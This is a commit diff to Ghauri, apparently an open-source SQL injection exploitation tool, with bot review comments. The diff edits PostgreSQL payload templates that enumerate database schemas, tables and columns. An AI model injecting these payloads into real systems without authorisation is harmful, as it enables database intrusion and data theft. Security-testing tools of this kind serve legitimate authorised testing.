  • Updated code for PostgreSQL SQL queries, tried to fix an issue with JSON parsing (still in testing phase), and fixed multiple other issues.

  • r0oth3x49 committed 2 years ago
    9b11bf2d
    1 parent d5f3c408
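--- a/README.md
+++ b/README.md
@@ -18,8 +18,8 @@
 ## ***Installation***
 
  - cd to **ghauri** directory.
- - install requirements: `pip install --upgrade -r requirements.txt`
- - run: `python setup.py install` or `python -m pip install -e .`
+ - install requirements: `python3 -m pip install --upgrade -r requirements.txt`
+ - run: `python3 setup.py install` or `python3 -m pip install -e .`
  - you will be able to access and run the ghauri with simple `ghauri --help` command.
 
 ## ***Download Ghauri***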
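--- a/ghauri/__init__.py
+++ b/ghauri/__init__.py
@@ -24,7 +24,7 @@
 
 """
 
-__version__ = "1.0.1#dev"
+__version__ = "1.0.2"
 __author__ = "Nasir Khan (r0ot h3x49)"
 __license__ = "MIT"
 __copyright__ = "Copyright (c) 2016-2025 Nasir Khan (r0ot h3x49)"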
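--- a/ghauri/common/payloads.py
+++ b/ghauri/common/payloads.py
@@ -1608,12 +1608,12 @@
  "(/*!SELECT*//**_**/COUNT(*)%23/**_**/%0AFROM%23/**_**/%0A(/*!INFORMATION_SCHEMA*/./**_**//*!TABLES*/)WHERE(TABLE_SCHEMA={db}))",
  ],
  "PostgreSQL": [
- "(SELECT COUNT(TABLENAME)::text+FROM pg_tables WHERE SCHEMANAME={db})",
- "(SELECT COUNT(TABLENAME)::text+FROM pg_tables WHERE SCHEMANAME+LIKE+'{db}')",
- "(SELECT COUNT(TABLENAME)::text+FROM pg_tables WHERE SCHEMANAME+IN+({db}))",
- "(SELECT COUNT(TABLE_NAME)::text+FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA IN({db}))",
- "(SELECT COUNT(TABLE_NAME)::text+FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA={db})",
- "(SELECT COUNT(TABLE_NAME)::text+FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE {db})",
+ "(SELECT COUNT(TABLENAME)::text FROM pg_tables WHERE SCHEMANAME={db})",
+ "(SELECT COUNT(TABLENAME)::text FROM pg_tables WHERE SCHEMANAME LIKE '{db}')",
+ "(SELECT COUNT(TABLENAME)::text FROM pg_tables WHERE SCHEMANAME IN ({db}))",
+ "(SELECT COUNT(TABLE_NAME)::text FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA IN({db}))",
+ "(SELECT COUNT(TABLE_NAME)::text FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA={db})",
+ "(SELECT COUNT(TABLE_NAME)::text FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE {db})",
  ],
  "Microsoft SQL Server": [
  "(SELECT LTRIM(STR(COUNT(name))) FROM {db}..sysobjects WHERE xtype IN (CHAR(117),CHAR(118)))",
@@ -1647,12 +1647,12 @@
  "(/*!SELECT*/ CONCAT_WS(0x09,/*!TABLE_NAME*/)FROM(/*!INFORMATION_SCHEMA*/./**_**//*!TABLES*/)/*!50000WHERE*/(TABLE_SCHEMA={db})LIMIT/**_**/0,1)",
  ],
  "PostgreSQL": [
- "(SELECT+TABLENAME::text+FROM pg_tables WHERE SCHEMANAME={db} OFFSET 0 LIMIT 1)",
- "(SELECT+TABLENAME::text+FROM pg_tables WHERE SCHEMANAME LIKE {db} OFFSET 0 LIMIT 1)",
- "(SELECT+TABLENAME::text+FROM pg_tables WHERE SCHEMANAME IN({db}) OFFSET 0 LIMIT 1)",
- "(SELECT TABLE_NAME::text+FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA={db} OFFSET 0 LIMIT 1)",
- "(SELECT TABLE_NAME::text+FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE {db} OFFSET 0 LIMIT 1)",
- "(SELECT TABLE_NAME::text+FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA IN({db}) OFFSET 0 LIMIT 1)",
+ "(SELECT TABLENAME::text FROM pg_tables WHERE SCHEMANAME={db} OFFSET 0 LIMIT 1)",
+ "(SELECT TABLENAME::text FROM pg_tables WHERE SCHEMANAME LIKE {db} OFFSET 0 LIMIT 1)",
+ "(SELECT TABLENAME::text FROM pg_tables WHERE SCHEMANAME IN({db}) OFFSET 0 LIMIT 1)",
+ "(SELECT TABLE_NAME::text FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA={db} OFFSET 0 LIMIT 1)",
+ "(SELECT TABLE_NAME::text FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE {db} OFFSET 0 LIMIT 1)",
+ "(SELECT TABLE_NAME::text FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA IN({db}) OFFSET 0 LIMIT 1)",
  ],
  "Microsoft SQL Server": [
  "(SELECT TOP 1 {db}..sysusers.name+CHAR(46)+{db}..sysobjects.name AS table_name FROM {db}..sysobjects INNER JOIN {db}..sysusers ON {db}..sysobjects.uid={db}..sysusers.uid WHERE {db}..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND {db}..sysusers.name+CHAR(46)+{db}..sysobjects.name NOT IN (SELECT TOP 0 {db}..sysusers.name+'.'+{db}..sysobjects.name AS table_name FROM {db}..sysobjects INNER JOIN {db}..sysusers ON {db}..sysobjects.uid={db}..sysusers.uid WHERE {db}..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY {db}..sysusers.name+'.'+{db}..sysobjects.name)ORDER BY {db}..sysusers.name+'.'+{db}..sysobjects.name)",
@@ -1683,9 +1683,9 @@
  "(/*!SELECT*//**_**/COUNT(*)%23/**_**/%0AFROM%23/**_**/%0A(/*!INFORMATION_SCHEMA*/./**_**//*!COLUMNS*/)WHERE(TABLE_SCHEMA={db})AND(/*!50000TABLE_NAME*/={tbl}))",
  ],
  "PostgreSQL": [
- "(SELECT COUNT(COLUMN_NAME)::text+FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA LIKE {db} AND TABLE_NAME LIKE {tbl})",
- "(SELECT COUNT(COLUMN_NAME)::text+FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA={db} AND TABLE_NAME={tbl})",
- "(SELECT COUNT(COLUMN_NAME)::text+FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA IN({db}) AND TABLE_NAME IN({tbl}))",
+ "(SELECT COUNT(COLUMN_NAME)::text FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA LIKE {db} AND TABLE_NAME LIKE {tbl})",
+ "(SELECT COUNT(COLUMN_NAME)::text FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA={db} AND TABLE_NAME={tbl})",
+ "(SELECT COUNT(COLUMN_NAME)::text FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA IN({db}) AND TABLE_NAME IN({tbl}))",
  "(SELECT COUNT(*) FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND nspname={db} AND a.relname={tbl})",
  ],
  "Microsoft SQL Server": [
@@ -1714,10 +1714,10 @@
  "(/*!SELECT*/ CONCAT_WS(0x09,/*!COLUMN_NAME*/)FROM(/*!INFORMATION_SCHEMA*/./**_**//*!COLUMNS*/)/*!50000WHERE*/(TABLE_SCHEMA={db})AND(/*!50000TABLE_NAME*/={tbl})LIMIT/**_**/0,1)",
  ],
  "PostgreSQL": [
- "(SELECT COLUMN_NAME::text+FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA LIKE {db} AND TABLE_NAME LIKE {tbl} OFFSET 0 LIMIT 1)",
- "(SELECT COLUMN_NAME::text+FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA={db} AND TABLE_NAME={tbl} OFFSET 0 LIMIT 1)",
- "(SELECT COLUMN_NAME::text+FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA IN({db}) AND TABLE_NAME IN({tbl}) OFFSET 0 LIMIT 1)",
- "(SELECT CONCAT(COLUMN_NAME)::text+FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA IN({db}) AND TABLE_NAME IN({tbl}) OFFSET 0 LIMIT 1)",
+ "(SELECT COLUMN_NAME::text FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA LIKE {db} AND TABLE_NAME LIKE {tbl} OFFSET 0 LIMIT 1)",
+ "(SELECT COLUMN_NAME::text FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA={db} AND TABLE_NAME={tbl} OFFSET 0 LIMIT 1)",
+ "(SELECT COLUMN_NAME::text FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA IN({db}) AND TABLE_NAME IN({tbl}) OFFSET 0 LIMIT 1)",
+ "(SELECT CONCAT(COLUMN_NAME)::text FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA IN({db}) AND TABLE_NAME IN({tbl}) OFFSET 0 LIMIT 1)",
  "(SELECT attname FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND nspname={db} AND a.relname={tbl} OFFSET 0 LIMIT 1)",
  ],
  "Microsoft SQL Server": [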
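Review bot: The whitespace normalization is not applied uniformly within the rewritten PostgreSQL lists: new line 1613 reads `IN ({db})` while 1614, 1652, 1688 and 1719 keep `IN({db})`, so the first hunk leaves two spellings of the same construct in one list. Since the stated purpose of these edits is to drop the `+` separators and standardise the templates, picking one form (`IN({db})` matches the majority) in the same commit would avoid a follow-up. The enclosing dict literal starts and ends outside these hunks, so any other entries it holds were not checked here.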
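--- a/ghauri/core/extract.py
+++ b/ghauri/core/extract.py
@@ -272,7 +272,6 @@
  f"error {error}, during operator check phase. Ghauri is going to retry"
  )
  retry_on_error += 1
- logger.debug(_temp)
  if _temp.ok:
  if _temp.msg:
  logger.warning(_temp.msg)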
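--- a/setup.py
+++ b/setup.py
@@ -5,7 +5,7 @@
 
 setup(
  name="ghauri",
- version="1.0.1#dev",
+ version="1.0.2",
  description="An advanced SQL injection detection & exploitation tool.",
  classifiers=["Programming Language :: Python3"],
  author="Nasir Khan",
@@ -34,6 +34,6 @@
  "error-based",
  "stacked-queries",
  ],
- python_requires=">=3.7",
+ python_requires=">=3.8",
 )
 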
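Review bot: `python_requires` is raised to `>=3.8` on line 37, but the classifier list on line 10 still reads `classifiers=["Programming Language :: Python3"]`, which is not a recognised trove classifier and so states no supported version at all; PyPI validates classifiers against the trove list on upload, and tooling that reads them will not see the 3.8 floor. Replace it with the standard form, e.g. `classifiers=["Programming Language :: Python :: 3", "Programming Language :: Python :: 3 :: Only"]`, and keep that list in step with `python_requires` on future bumps. The `setup(...)` call spans both hunks, with its remaining keyword arguments in the skipped region between them.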